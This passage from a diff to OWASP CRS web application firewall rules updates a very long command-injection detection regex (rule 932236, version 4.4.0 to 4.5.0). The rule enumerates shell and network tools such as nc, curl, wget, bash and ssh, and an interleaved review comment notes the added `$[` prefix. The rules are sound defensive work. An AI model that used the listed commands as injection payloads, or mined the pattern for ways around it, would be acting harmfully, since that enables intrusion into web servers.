\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#
\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|an|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|
idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<
>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[^\s\x0b]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?
:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ "id:932236,\ phase:2,\ block,\ 
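Review bot: The substantive change in this hunk is that the leading-context alternation `\$(?:\(\(?|\{)` becomes `\$(?:\(\(?|[\[\{])`, so a `$[` token is now accepted before a command name by rule 932236, and that one-character addition sits inside a hunk that is otherwise a version bump of a very long generated expression. The same `[\[\{]` form appears on the new side of 932220 earlier in this chunk, so the two rules stay consistent, but the commit description should name this change and a regression test covering the new `$[` prefix should accompany it; no such test is visible in this chunk. Separately, the assignment sub-pattern `\$(?:.*|.*)` on the new side has two identical branches, which is harmless but suggests the generator's source could be tidied.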
@@ -591,11 +591,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{
]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)
|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\
|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|in
g|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:c|a(?:ll|tch)[\s\x0b&\)<>\|]|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?